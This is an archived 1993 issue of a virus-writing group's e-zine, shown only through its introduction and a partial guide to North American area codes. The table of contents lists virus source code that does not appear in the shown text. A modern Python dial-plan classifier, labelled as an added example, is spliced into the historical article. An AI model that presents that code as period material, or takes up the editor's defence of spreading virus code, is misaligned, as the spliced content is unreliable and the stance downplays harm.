💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › NUKE › nk-info6.txt captured on 2022-06-12 at 13:40:39.
-=-=-=-=-=-=-
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
NuKE Informational Journal
Volume 1 Issue #6
May 1993
(C) Copyright NuKE, 1992, 1993
<tm> NuKE is a trademark registered to NuKE Inc., which is a legally
registered company name in Canada & The United States of America
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
Article Topic/Titles
~~~~~~~~~~~~~~~~~~~~
000. This Article............................................................
001. Introduction to the "NEW" NuKE and NuKE Activities......................
002. A Guide to the North American Numbering System..........................
003. National Computer Security Association (NCSA) Cover Report..............
004. Interactive Realtime Information Service (IRIS) Guide...................
005. Programming the Floppy Disk Controller & the DMA Chip to bypass Int 13h.
006. The Varicella Virus Source Codes........................................
007. The `Arms Race' on Disk-Based Protection Methods : Round One............
008. The `Arms Race' on Physical Protection Devices : Round Two..............
009. AT&T Talk Tickets: Hacker's Heaven? Maybe...............................
010. Mafia, Incorporated. Underworld extends its reach.......................
011. Rivest, Shamir, Adleman, (RSA) Encryption...............................
012. `Clipper Chip' State-of-the-Art Encryption or State-of-the-Art Backdoor.
013. Lies, Scandals and Roomers of the Anti-Virus Community..................
Thanks to NuKE Contributors/Supporters (in alphabetical order)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Aristotle..............(USA)
Dr.X...................(Canada)
FireCracker............(USA)
Ford Fairlane..........(Sweden)
Lloyd..................(Sweden)
Ned239.................(USA)
Nereus.................(USA)
Nowhere Man............(USA)
Prozen Doberman........(Australia)
Pure Energy............(Canada)
Rock Steady............(Canada)
Savage Beast...........(Switzerland)
Screaming Radish.......(Australia)
Shindaq Arl'hur........(Australia)
Silent Shadow..........(Canada)
TaLoN..................(Australia)
The Dark Elf...........(Australia)
The Weird One..........(Australia)
Throbbing Grisle.......(USA)
Uli....................(Switzerland)
Viper..................(USA)

Also Farewell To
~~~~~~~~~~~~~~~~
Tormentor & DY.......(Sweden)
(Good-bye Tormentor and your group Demoralized Youth, it was an honour
to chat amongst thyselves. Thanx for the constructive criticism, good
luck in the future.  Rock Steady/NuKE )
H O W T O C O N T A C T N U K E
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Cybernetic Violence BBS....514-426-9194 v32B NuKE WHQ (*NEW NUMBER*)
Black Axis.................804-599-4152 v32B USA NuKE HQ
Realms of Choas.........+61-XX-ASK-NUKE Dual Australia NuKE HQ
Enigma E:N:U:N..........+41-22-340-0329 v32B European NuKE HQ
Please note that "Cybernetic Violence" BBS will under go a NEW Phone number
Starting May 29th, 1993. Please take note of the phone number, and remember
to call the new number on/after May 29th, 1993.
The above are free access systems, please feel free to contact the closest one
to you.
Signed, NuKE Members/Supporters
================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
"Introduction to the `New' NuKE and NuKE Activities"
By the Editor, Rock Steady
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
% Introduction %
Welcome to the sixth issue of this Informational Journal. With regards to
what goes on in the `modem world' commonly known as CyberSpace, NuKE has
undergone several changes and recommendations in order to un-cloud the thoughts
and impressions the public has towards NuKE.
I do wish to make it clear that there have been TWO unique gatherings of a
computer group called `NuKE'. The original was founded by The Darkman, who has
now left the scene. The second was created by myself, Joseph Greco aka Rock
Steady. I wish to state that I simply revived the NuKE name; old members with
The Darkman were evicted from this New NuKE founded by myself, along with
Nowhere Man, Phrozen Doberman and Screaming Radish.
% What does this NuKE do? %
We are _not_ a copious group of computer virus programmers. Surely, we set a
few eminent examples that dominated the so-called `virus scene'. And surely
we have created ingenious creations that have pressured many others to
`mimic' our moves. How lethargic and bleak can some group/person get, if they
(the so-called virus groups) have to imitate _us_, who are here simply for
the gain of self-knowledge? Frankly we are not solely a virus group, nor
`teens' for that matter. We understand that all the existing `so-called'
virus groups are kids/teens, and therefore can understand where such a label
can originate from.
The computer industry has opened a channel of unlimited information, a gain
for self-knowledge advancements. We members/supporters of NuKE only wish to
advance by self-knowledge advances and perhaps educate those that wish to be
educated. We need to educate the world, no more secrets, it is the only way
we can succeed in this world. And for this we are labelled as computer
criminals. Why is it wrong to want to learn how a computer functions internally?
Why is it wrong to show you possible loops and holes that can make a computer
system vulnerable to unauthorised access?
There is a different class of society here in the computer world. A class that
can obtain knowledge at alarming rates. A class that seeks and lives on
information. A class that wishes to try out new ideas, and experiment others
in order to advance intellectually. And yet the public wishes to suppress this
minority group that can be even classified as ingenious.
Surely we must not mistake those that have a destructive intent into this
category. For I find that this type of disfigured character must be plucked out
just like a cancerous cell at its early cellular growth.
So what does NuKE do? Together we learn, and together we experiment. I wish to
bring out the fact that every article here, has undergone extensive research,
none of it is `second-hand' news. We will not take a `Michelangelo disassembly'
when the exact recreation exists. We will not talk about `Anti-Debugger'
routines when the exact article/examples have been seen in a text file publicly
floating around the Technodrome. We will not `mimic' anyone, or try to `look'
better than they, for the purpose that this is not a game of fame. NED was an
exceptional toolkit made in October 1992, that started with the idea of the
Dark Avenger's MtE. NED is now publicly available today, with its SOURCE CODES,
and surely enough we will see _many_ "mimic-kids" producing their own based
on our trend, and make inarticulate claims that their engine was created
solely by them. Simply looking at NED will influence your style of programming.
Some unknown author in an unknown United States `so-called' virus group, has
already recreated a shroudy example, that structurally looks exactly like
N.E.D.
Anyhow, it's up to you, the reader, to call these jokers out. We will
not cloud our opinions with any emotional hatred to anyone or group. We
believe in publishing works that are original, or state an original opinion,
or fact.
The NEW NuKE is undergoing dramatic changes in order to help with our overall
impression. The New NuKE has even made major attempts to legalize itself
by registering its name. However we are still going through this
legalization procedure, but do stay tuned for the next Informational Journal,
issued out mid-July 1993, which will contain our registered company name and
number, along with an official mailing address (PO Box) registered to the
NuKE name. NuKE has already made attempts to branch itself onto the Internet.
As we may feature an open access unix (*NIX) site, we certainly will have a mail
link to send/receive UUCP mail to our WHQ BBS (Cybernetic Violence).
% Ahhhh, We're on the Net %
I certainly cannot guarantee something in the making, but a UUCP/Usenet connection
is a _very_ possible feature in the near future. I will not toy with you, I will
say simply that we are in the process of transforming our system(s), and looking
at all possible Unix based systems. It does look like our choice will be
between 386BSD or Linux 0.99.7A, which feature the TCP/IP protocols to establish
a link with the Internet, if that is to happen. Indeed, a Usenet feed will be made
if our budget does not meet the Internet connection fees. We currently have
pooled two 386/33Mhz PCs remotely, with a total disk space of 700 Megs and with
a CD-ROM to run the software off directly (Linux), all with three 14.4k V32Bis
modems and one 14.4k HST based modem. It seems that we will feature an
open Unix system. We find free informational groups such as NuKE should be
hooked up to perhaps what is the biggest international network today.
It certainly will cut down on long distance toll charges, which seem to hover
at $500.00 monthly, hitting about $6000.00 yearly. This is in Canadian Dollars;
however, take into account that Canadian long distance calls are much cheaper
compared to our USA counterpart. A one hour call originating from Canada to the
United States will cost $15.00 (Can$), where the USA counterpart will pay
closer to $20.00 (US$), about $25.00 (Can$). The same does apply for
international calls, which tend to cost more if originating from the USA. All
in all, taking the currency exchange rate into account, that $6000.00 (Can$)
translates to $7000.00 (Can$) if originated from the USA.
I leave you to read the NuKE Informational Journal #6. If you do have any
comments that you wish to send to the Editor, Rock Steady, please do so.
If you wish to email me concerning a private matter, we feature Rock Steady's
personal public key.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.2
mQCNAiv/nIAAAAEEAKuoCTNG4Ahwp9vsdc7FL7PpFEc/oss29OF30v44wNZ3Qwxh
uBrqjUOrRJyx3oLV3qrofaJG9BZp2u6NUpo0wTUOQHf0lUt/WWENbYdCYdFfz+Yt
x6XoGgKY5M/S2LEUOaDT48ye/E9VzW5bXg0if5fKnqpD7j+e/E0EOTLgG0HDAAUR
tB5Sb2NrIFN0ZWFkeSBvZiBOdUtFIFBHUCBLZXkgIzE=
=In5p
-----END PGP PUBLIC KEY BLOCK-----
% What's to come, of NuKE? %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This Informational Journal sure was `bad' timing. All to be explained in due time,
of course. But we did prolong this journal for quite a long while, due to the many,
many more articles we wanted to publish. Unfortunately, time stands still for
no-one, not even for NuKE. We gathered enough information for another
Informational Journal, but the articles were somewhat incomplete, to our
standards. We received several articles from guest writers concerning Cellular
Phones, Radio Communications, and other bits and pieces. If anyone has any
additions or experiences for these topics, please do contact us.
We await to see you soon...
================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
"A guide to the North American Numbering System"
By Nowhere Man
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
% Introduction %
~~~~~~~~~~~~~~~~
Recently it was announced that the final available area code (under the current
area code format), 610, has been appropriated for use in southeastern
Pennsylvania. With this change, all standard area codes for the North
American phone system have been exhausted. While the final cutover to 610
will not be for another year, this is a landmark for our phone system. In
response to this announcement, I've decided to release various information
which I've been gathering about the North American phone system to the general
public. I hope everyone finds it of interest.
Please note that this article assumes that you know nothing about the
North American phone system, so readers from the United States and Canada
may find some of the information I present to be rather obvious (what 411
and 911 are, for example, or how various calls are placed by a customer);
please bear with me for the benefit of those in Europe, etc., as there's
some (in my opinion) very interesting information that I've uncovered about
our telephone network.
% Background %
~~~~~~~~~~~~~~
The North American phone network is the oldest in the world, yet also
uses some of the most modern techniques and equipment. Unlike the majority
of phone networks, which cover individual countries, the North American
phone system covers the United States, Canada, and most of the Caribbean
islands (such as Puerto Rico, Barbados, and so on). While calls between
various countries on the North American system are generally billed at
international rates, they are dialed like any other long-distance call.
The entire North American phone system is assigned the country code +1;
hence, it is often referred to officially as "World Zone One." World Zone
One is further divided into area codes (three digits), which cover larger
regions (states, provinces, etc.); exchanges, also three digits, which
cover towns or small parts of a larger city; and subscriber-loop numbers
(four digits), which identify a given customer in each phone exchange.
Together, these form a ten-digit phone number -- unlike many areas, North
America assigns ten-digit numbers to everyone, regardless of location (in
contrast, the U.K. uses two-or-three digit city codes, an optional exchange
[for larger towns] of up to three digits, and four digit subscriber
numbers).
% Organization of area codes %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The de-facto standards bureau for North America's phone network is
Bell Communications Research Inc. (Bellcore). Bellcore was formed at the
1984 AT&T divestiture as the shared research arm of the regional Bell
holding companies and provides technical and research support to them.
Bellcore maintains common standards for the telephone systems, ensures a
smoothly operating telecommunications network, and coordinates operations
during national emergencies. Bellcore assigns all area codes and guides
other aspects of the telephone numbering scheme.
Area codes, known as Numbering Plan Areas (NPAs) in North America, are
presently of the form N0X or N1X, where N represents a number between two
and nine, and X is any number between zero and nine; however, area codes
ending in -00 or -11 are reserved for special purposes (see below), and are
therefore currently unavailable. Originally, central office (exchange)
codes were in the form NNX, which distinguished them from area codes, as
only area codes had a zero or one in the second digit. However, with
increased demand for phone numbers, most exchanges have changed to the NXX
format (ie. the second and third digits of an exchange code can be any
number, zero to nine). Naturally this presents problems, as exchanges
whose second digit is one or zero are now indistinguishable from NPAs. As
a result, most areas use "one-plus" dialing: to make a long-distance call
you dial one plus the area code plus the local number, and the leading one
tells the switch that an area code, not an exchange, follows.
Area codes were initially assigned in 1947, with at least one being
assigned to each American state and Canadian province and several being
assigned to more populous ones -- in all 86 NPAs were originally assigned.
Currently the only exceptions to this "one or more NPAs per state" are in
Canada, where 902 serves both Nova Scotia and Prince Edward Island, area
819 covers the eastern Northwest Territories as well as part of Quebec, and
area 403 covers Alberta, Yukon and the western Northwest Territories; in
addition, the 809 area code covers many locations throughout the Caribbean,
from Puerto Rico to the Bahamas to the Virgin Islands to Jamaica. (Note:
Midway Island and Wake Island, two U.S. possessions in the Pacific Ocean,
have just been added to area code 808 [Hawaii]. Prior to this time, they
were not direct dialable.)
The original proposal suggested that the 86 area codes be assigned in
a semi-regular pattern (for example, Canada would have been 915, 914, 913,
916, 917, 918, 919, 910 from east to west by province). This plan was
modified to eliminate the confusion caused by "similar" area codes
adjacent to each other. A state initially assigned a single area code
would have zero for its NPA's middle digit, while a state with more than
one NPA would have a one as the middle digit. Areas where more inward
calls were expected (major metropolitan areas like New York City) received
"short pull" area codes like 212, because the dialing time would be shorter
(remember, this was in the days of rotary phones, where each digit costs
as many pulses as its value and a zero costs ten) and the mechanical
switching equipment would be tied up for shorter periods. For example, New
York City received 212 (a total of five pulses), while Chicago and Los
Angeles, the next two most populous areas in the U.S., received 312 and 213
(six pulses each), respectively. This went all the way on down to NPA 809,
the Caribbean, which required 27 clicks of the rotary dial and would
presumably be dialed least frequently. Of course, with the dominance of
DTMF dialing, a region's NPA is no longer significant... (As a side note,
New Jersey was originally given the area code 201, the smallest
[numerically] area code; the usual explanation is that the Bell System's
research labs were headquartered there. Bellcore itself did not exist until
1984, long after the 1947 assignment.)
Since the initial assignment, there have been numerous area code
splits, where certain telephone exchanges are removed from an area code and
placed into a new code. Since 1980 there have been at least twenty such
splits. The first split occurred in the early 1950s, and the final split
under the current format will occur when 610 is created in 1994.
In the U.S., NPAs were further subdivided into LATAs (Local Access
Transport Areas) after the breakup of AT&T in 1984. Before this time,
there was no real definition of what was local and what was
long-distance; in order to be fair to communities on state borders, etc.
(imagine paying LD charges to call five miles away!), LATAs were created
that encompassed "populated areas with common calling needs." All calls
made within a LATA are handled by the common local telephone company (New
York Telephone, Pacific Bell, Illinois Bell, etc.), which currently
subscribers cannot choose (this will probably change in the next few
years), while all calls between LATAs are handled by a customer-chosen
long-distance carrier (AT&T, MCI, Sprint, etc.) and are subject to federal
regulation. A LATA may cover a small area or a whole state; they are
usually contained within one NPA, but may cover several (e.g. the Chicago
LATA covers all of area codes 312 and 708). As of 1991 there were 196
LATAs (and I believe this will not change). Canada does not currently have
a LATA system, though it may soon develop one. LATAs are assigned codes,
but these are only for billing purposes, and are not dialed by the
customer; in fact, LATAs are transparent to the caller, except for
routing/billing purposes.
Direct Distance Dialing (the ability to place long-distance calls
without going through an operator) was first implemented on
November 10, 1951 in Englewood, New Jersey, USA, though it was not
wide-spread until the 1960s. There was early use of 11X+ codes for
long-distance dialing, but eventually 1+ long-distance dialing became
standard. As stated, area codes were assigned in 1947, four years before
anyone would need one. Why was it done? I'm not sure. It can only be
assumed this was done for 1) future planning and 2) the operators' benefit.
(Another odd thing is that 0+ [operator-assisted] dialing became available
in 1960, almost ten years after direct-dialing was introduced. Why did
they bother? Beats me.)
Surprisingly enough, a few tiny areas within the United States and
Canada are *still* not direct dialable, but they're in remote regions.
This includes some isolated ranches in the Texas desert (Bar J Ranch,
Double B Ranch, etc.), bordellos and truck stops in Nevada desert areas
(Amargosa, Corncreek, etc.), and some wilderness towns in California
within the U.S., and remote resorts in Ontario (Kingfisher Lake and Deer
Lake, for example) and isolated arctic villages in the Yukon and NWT
(Redknife, Taglu, etc.), in Canada. These areas must be serviced via
radiophone, so an operator is required.
% Non-standard area codes %
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Certain area codes are not available for normal purposes. These can
be generally subdivided into two categories: "Service Access Codes"
(SACs), NPAs ending in -00, or "11" services, NPAs ending in -11.
Service Access Codes are employed like normal area codes (and are
dialed normally), but are not assigned to customers in any one geographic
area. Rather, SACs are used for Wide-Area Telephone Service (WATS) by
businesses. Currently, only four SACs are employed, and only three can be
dialed by normal customers at the present.
600
~~~
The 600 NPA is currently reserved for Canadian TWX systems
(see below) and ISDN usage. To my knowledge, it is not dialable
by normal customers. (In fact, I've seen it used in TV shows
for 800 numbers like 555 is used for local numbers [ie: call
1-600-FLO-WERS for a fake flower company, since the real
1-800-FLO-WERS already belongs to FTD Florists, who would
probably not appreciate hundreds of crank calls tying up their
business line].)
700
~~~
1-700 numbers are used for Group Access Bridging (GAB) lines:
teleconferencing, EasyLink 700 service, chat lines, etc. (Note
the cute little acronym...who says Bell doesn't have a sense of
humour?) The most famous 700 service is Alliance<tm>
Teleconferencing from AT&T, but there are many other chat lines
available to those with lots of money to burn. The 700 exchange
is also used for AT&T EasyLink 700 service, where a customer
gets a phone number that can be rerouted to any phone he visits.
For example, if a businessman is traveling around the country,
at each hotel he stays at he can dial up an 800 number, enter
his phone number and PIN, then the current phone number, and all
calls to his EasyLink number ring on the phone line he entered;
now the office always knows which number he can be reached at.
In addition to GAB/EasyLink services, the 700 NPA is
sometimes used to allow intra-LATA calls to be placed via your
long-distance carrier. By dialing 1-700-NXX-XXXX you are really
calling NXX-XXXX but being billed by your long-distance company
instead of the local telco. Not all LD services offer this,
though (AT&T, for one, does not, but Telecom*USA does). To find
out if this is available from your carrier, either call the
long-distance operator, or try calling yourself via the 700 NPA
(if it's busy [or your call-waiting beeps] you can use the 700
area; or, you can call your other line, if you have one, or a
friend to test this out).
800
~~~
800 service was pioneered by AT&T in the 1960s and has since
been widely copied, with many countries adopting an 800-style code
(often 0800) for toll-free dialing. 1-800 numbers are used by
businesses, and, increasingly, residential customers, as a
service to clients (or, in the case of home users, to college
students, truck drivers, and others who need to call home a
lot) -- the business decides which areas it wants to provide 800
access in (home state/province only, nearby states/provinces,
a whole region of the country, a whole country, U.S. and Canada,
or even international, all at increasing cost), and people in
those areas who call the 800 number are not billed for the call:
the business is. Each 800 number maps to a normal phone number,
and the caller is billed normally for the call, however just
before the bill is totaled, any 800 calls are removed from the
bill and instead billed to the 800 line's owner. The owner of
the 800 line pays a startup charge, a monthly fee, and a fee for
every fraction of an hour that the line is in use. (Note that
as of May 1, 1993 800 phone numbers belong to the business
that operates the line and *not* the phone company. This is a
step towards the day where every customer will get a permanent
phone number no matter where they move, which company they use,
etc. This also means that long-time customers are finally free
to leave AT&T without losing their old phone numbers...)
Before 800 service, local businesses could provide toll-free
service with "Zenith Numbers" (ie. ZEX-XXXX under the exchange-
name system). Since "Z" isn't on the phone dial, the caller had
to have an operator place the call, which was then billed to the
business. (This service is still in use in Canada.)
900
~~~
1-900 numbers are infamous as kinky phone sex lines, rip-off
astrological recordings, etc.; however 900 service is actually
much like 800 service... Nothing about 1-900 service dictates
that the caller be charged for the call (though he invariably
is) -- the key difference between 800 and 900 service is that
900 lines have much higher call-handling capacity (some 900
lines can receive hundreds of thousands of calls at once without
jamming!). In addition, 900 service allows the provider to
make the caller pay a portion of the charges. As a result, 900
lines have become pay-per-call lines, where the user is charged
$0.25-$50.00 plus per-minute costs to listen to pre-recorded
messages, chat one-on-one with some cheap whore, etc.
The other group of special "area codes" are the N11 series of NPAs.
These numbers are not true NPAs, but rather numbers that Bell has assigned
to certain key services (police/fire, directory assistance, etc.) as a
service to customers -- you just dial the three digits (or 1+ the three
digits in some areas), and the call is quickly completed. The -11 codes
include:
011
~~~
011 is the international dialing prefix in World Zone One.
(Unlike most of the rest of the world, which uses 00 for
overseas calls, North America uses 011.)
211
~~~
This code is no longer in service (to my knowledge), but in
"the old days," before Direct Distance Dialing (ie. pre-1960s),
211 called up the AT&T long-distance operator, who would place
your long-distance call for you. Naturally, this is no longer
needed (operator-assisted calls are placed via the long-distance
operator at 00), so 211 is generally not used in most areas (in
a few NPAs 211 is a ringback).
411
~~~
411 reaches local directory assistance (as if you dialed
555-1212). This operator only gives numbers within your NPA
(sometimes in neighbouring NPAs, too); to find a number in a
different area you have to dial NPA-555-1212.
511
~~~
511 is generally unused, though in a few places it is used
for ringback.
611
~~~
611 reaches your local telephone company's repair office.
You provide the man/lady with your error, and for an outrageous
fee ($1.15/minute in my area), they'll send out a lineman to
(hopefully) find and correct the problem.
711
~~~
The 711 code is not always available, and its actions
depend on where you live -- in British Columbia, for example,
0+711 is used for mobile service, while in Illinois 711 reaches
the emergency bureau as if you dialed 911 (see below). In a few
areas 711 is the ringback number.
811
~~~
In some areas 811 dials the local telco's business office.
This code was more universal in the past, as now most areas
have moved the business office to a 1-800 number (leaving 811
unused).
911
~~~
The world-famous 911 code calls up a special emergency center
where your call is processed and forwarded on to the appropriate
agency (police, fire department, ambulance, etc.). The 911
operators automatically receive your name, phone number, address
and other information when you call (computers and ANI do the
magic), so be wary of trying to mess with this service (not a
good idea anyway, as 911 performs a valuable public service).
911 is not available in all areas (mostly rural areas), so this
code isn't universal.
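The dialing rules scattered through the sections above (N0X/N1X area codes, NXX exchanges and the need for 1+ dialing, the -00 Service Access Codes, the N11 service codes, the 011 international prefix, the rotary pulse counts used to pick "short pull" codes, and the dial-letter mapping behind 1-800-FLO-WERS and the undialable "Z" of a Zenith number) are all things a PBX dial-plan filter or a toll-fraud monitor has to get right. The following is an added example, not from the original article, that encodes those 1993-era rules as a classifier for dialed strings; the function names, the `Dialed` record, and the sample numbers (1-800-FLO-WERS is the one quoted above, the others are constructed) are the example's own, and the 710 handling follows only what the article says about it.

```python
"""Classifier for dialed strings under the 1993 NANP rules described in the
article (added example; function names and sample numbers are the example's
own assumptions, not part of the original text)."""
from dataclasses import dataclass
import re

# Three-digit service codes from the article's N11 list.
N11_SERVICES = {
    "211": "long-distance operator (historical)",
    "411": "local directory assistance",
    "511": "generally unused / ringback in a few places",
    "611": "telco repair office",
    "711": "varies by region (mobile service, 911 alias, ringback)",
    "811": "telco business office",
    "911": "emergency center (ANI delivers caller identity)",
}

# Service Access Codes: NPAs ending in -00, not tied to a geographic area.
SAC_SERVICES = {
    "600": "Canadian TWX / ISDN; not dialable by normal customers",
    "700": "GAB lines, EasyLink 700, intra-LATA via LD carrier",
    "800": "toll-free; billed to the line's owner",
    "900": "pay-per-call; caller pays a portion of the charges",
}

# 1993 keypad: no Q and no Z, which is why a Zenith (ZEX-XXXX) number
# could only be placed by an operator.
KEYPAD = {ch: digit
          for digit, letters in {"2": "ABC", "3": "DEF", "4": "GHI", "5": "JKL",
                                 "6": "MNO", "7": "PRS", "8": "TUV", "9": "WXY"}.items()
          for ch in letters}


@dataclass
class Dialed:
    kind: str            # international, n11, sac, reserved, long_distance, local, ambiguous, invalid
    npa: str = ""
    exchange: str = ""
    subscriber: str = ""
    note: str = ""


def rotary_pulses(digits: str) -> int:
    """Pulses a rotary dial sends: digit d costs d pulses, 0 costs ten."""
    return sum(10 if d == "0" else int(d) for d in digits)


def to_digits(dialed: str):
    """Map dial letters to digits; return None if a letter has no key (Q/Z).
    Dashes, spaces and '+' are treated as separators and dropped."""
    out = []
    for ch in dialed.upper():
        if ch.isdigit():
            out.append(ch)
        elif ch in KEYPAD:
            out.append(KEYPAD[ch])
        elif ch.isalpha():
            return None
    return "".join(out)


def is_npa(code: str) -> bool:
    """Current-format area code: N0X or N1X with N in 2-9; -00 and -11
    endings are reserved and handled separately."""
    return re.fullmatch(r"[2-9][01][0-9]", code) is not None and code[1:] not in ("00", "11")


def is_exchange(code: str) -> bool:
    """NXX central-office code: any digits after a leading 2-9."""
    return re.fullmatch(r"[2-9][0-9][0-9]", code) is not None


def classify(dialed: str) -> Dialed:
    """Classify a dialed string by the article's rules."""
    d = to_digits(dialed)
    if d is None:
        return Dialed("invalid", note="letter with no dial position (Q/Z); operator-placed Zenith-style number")
    if d.startswith("011"):
        return Dialed("international", note="011 is the World Zone One international prefix; country code follows")
    if len(d) == 3:
        if d in N11_SERVICES:
            return Dialed("n11", npa=d, note=N11_SERVICES[d])
        return Dialed("invalid", note="three-digit code that is not an N11 service")
    if len(d) == 7:
        if is_exchange(d[:3]):
            return Dialed("local", exchange=d[:3], subscriber=d[3:])
        return Dialed("invalid", note="exchange must be NXX")
    if len(d) == 10:
        # Without the leading 1 an N0X/N1X exchange cannot be told from an NPA.
        return Dialed("ambiguous", note="ten digits without 1+: NPA indistinguishable from an N0X/N1X exchange")
    if len(d) == 11 and d[0] == "1":
        npa, exch, sub = d[1:4], d[4:7], d[7:]
        if not is_exchange(exch):
            return Dialed("invalid", npa, exch, sub, "exchange must be NXX")
        if npa in SAC_SERVICES:
            return Dialed("sac", npa, exch, sub, SAC_SERVICES[npa])
        if npa == "710":
            return Dialed("reserved", npa, exch, sub, "710: telco/government use, not customer-dialable")
        if is_npa(npa):
            return Dialed("long_distance", npa, exch, sub,
                          f"geographic NPA; {rotary_pulses(npa)} rotary pulses to dial it")
        return Dialed("invalid", npa, exch, sub, "not a valid N0X/N1X area code")
    return Dialed("invalid", note=f"{len(d)} digits is not a recognised length")


if __name__ == "__main__":
    for sample in ("1-800-FLO-WERS", "1-212-555-1234", "911", "ZEN-1234", "212-555-1234"):
        print(sample, "->", classify(sample))
```

Feeding a dial plan through `classify` before a call is routed is the kind of check that keeps a PBX from completing 1-900 or 1-700 calls it should refuse, and the pulse count reproduces the article's reasoning about why 212 went to New York and 809 to the Caribbean.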
% Unusual area codes %
~~~~~~~~~~~~~~~~~~~~~~
At one time, several area codes were used for non-standard purposes.
These deserve some special attention.
Area codes ending in -10 used to be TWX (TeletypeWriter eXchange) area
codes. (TWX was an old system used in the days before faxes and modems.
Teletypewriters communicated similar to terminals -- a person on the
transmitting end would type a message, and a printer on the receiving end
would print it out. This is how telegrams were sent.) TWX area codes were
not normally dialable from a regular phone, to my knowledge, and were
reassigned to regular telephone service as the demand for new NPAs
increased and TWX service was eliminated (around 1990). The TWX NPAs
served the following regions:
410 - United States, northeastern region
510 - United States, east of Chicago
610 - Canada [now located at NPA 600]
710 - United States, southeastern region
810 - Mexico
910 - United States, from Chicago westward
The other set of area codes that deserves mention are the Mexico
access numbers. Mexico is not integrated into World Zone One, and is
assigned the country code +52. However, a large number of calls are placed
to Mexico from North America, so in the days before International Direct
Distance Dialing was universal, AT&T assigned three special NPAs for
Mexico. These were not NPAs in the true sense: they mapped to Mexican
city codes and local numbers. In addition, they were not dialable from
outside of the U.S. and Canada. By 1990 IDDD was available from everywhere
in North America, so on February 1, 1991 the codes were released for use as
true area codes. These codes were as follows:
706 - Northwest Mexico (Tijuana area) [now northern Georgia]
903 - Southwest Mexico (Guadalajara area) [now northeast Texas]
905 - Mexico City area [soon to be southern Ontario]
As you might have noticed, these numbers conveniently map to Mexican
phone numbers: 706 was really for 70-6X-XXXXXX, 903 was for 90-3X-XXXXXX,
and 905 was for 90-5-XXX-XXXX. All of these map to ten digits, an NPA
and local number in World Zone One...
The 909 area code was used at one time for the Telenet Communications
Data Network, now known as SprintNet. When area codes became scarce, Bell
took back the area from Telenet, giving it an "interchangeable" area code
instead (see below); I'm not sure which area they received. 909 was
chosen, naturally, because it takes the longest amount of time of any area
code to dial on a rotary phone (28 clicks). Since Telenet was to be used
by computers, which had TouchTone dialing, this didn't matter... 909 is
now being used by Riverside and San Bernardino Counties in southern
California (formerly part of the 714 area).
Finally, what about the 710 area code? 710 is reserved for telephone
company and U.S. government purposes, but little is known beyond that.
It *cannot* be dialed from a normal telephone. Most operators deny its
existence. Which agencies use it? Why? Is this NPA for special "secured
lines?" Is it even used at all? If anyone has more information about this
area code, please let me know.
% Area code statistics %
~~~~~~~~~~~~~~~~~~~~~~~~
Which states/provinces have the most area codes? Here are the top five:
1. California, USA -- 13
2. New York, USA/Texas, USA -- 9
3. Illinois, USA -- 6
4. Ontario, Canada/Pennsylvania, USA -- 5
5. Florida, USA/Ohio, USA/Michigan, USA -- 4
(Note: After 416 splits, Ontario will be tied with Illinois for 3rd
place with six area codes each; Michigan will move up to number four with
five NPAs when 313 finally splits. At least ten states and one province
have three NPAs.)
Which area codes have the most exchanges in them? The top ten are:
1. 212 (New York, USA) -- 705*
2. 205 (Alabama, USA) -- 693
3. 919 (North Carolina, USA) -- 691*
4. 313 (Michigan, USA) -- 688*
5. 416 (Ontario, Canada) -- 680*
6. 215 (Pennsylvania, USA) -- 665*
7. 602 (Arizona, USA) -- 657
8. 206 (Washington, USA) -- 649
9. 708 (Illinois, USA) -- 644
10. 713 (Texas, USA) -- 636
(Note: Starred exchange numbers mean that the NPA is scheduled for
a split by 1994 [212 is moving some exchanges to 718 right now].)
Which area codes have the fewest exchanges? The top ten are:
1. 807 (Ontario, Canada) -- 105
2. 906 (Michigan, USA) -- 117
3. 302 (Delaware, USA) -- 129
4. 413 (Massachusetts, USA) -- 135
5. 401 (Rhode Island, USA) -- 141
6. 307 (Wyoming, USA) -- 171
7. 607 (New York, USA) -- 176
8. 719 (Colorado, USA) -- 179
9. 802 (Vermont, USA) -- 181
10. 506 (New Brunswick, Canada) -- 182
(Note: 917 [New York pager/cellular service] was omitted because it
is growing too fast... It had 104 exchanges as of January, but by
April it had 124. By now it surely has more. Besides, I don't like to
consider it a real area anyway.)
(All exchange data is from April 15th, 1993, so this may have
changed by now.)
Which area codes have the most unlisted numbers? Well, nine out of
the top ten area codes are in California. While most people would probably
quickly attribute this to the infamous "California" attitude, it's most
likely due to the fact that Pacific Bell offers the lowest rates for
unlisted numbers ($0.30/month in California, compared to $1.50/month in
Chicago, $1.88/month in New York, and $4/month in Idaho). The ten NPAs
with the most unlisted numbers (in percent of total numbers) are:
1. 702 (Las Vegas, Nevada, USA) -- 64.6%
2. 209 (Fresno, California, USA) -- 63.1%
3. 213 (Los Angeles, California, USA) -- 61.7%
4. 510 (Oakland, California, USA) -- 61.6%
5. 408 (San Jose, California, USA) -- 60.2%
6. 916 (Sacramento, California, USA) -- 59.8%
7. 909 (Riverside, California, USA) -- 57.7%
8. 818 (Anaheim, California, USA) -- 57.1%
9. 619 (San Diego, California, USA) -- 56.5%
10. ??? (Bakersfield, California, USA) -- 55.2%
Finally, which areas were considered "the most important" when area
codes were handed out; in other words, which areas were assigned the NPAs
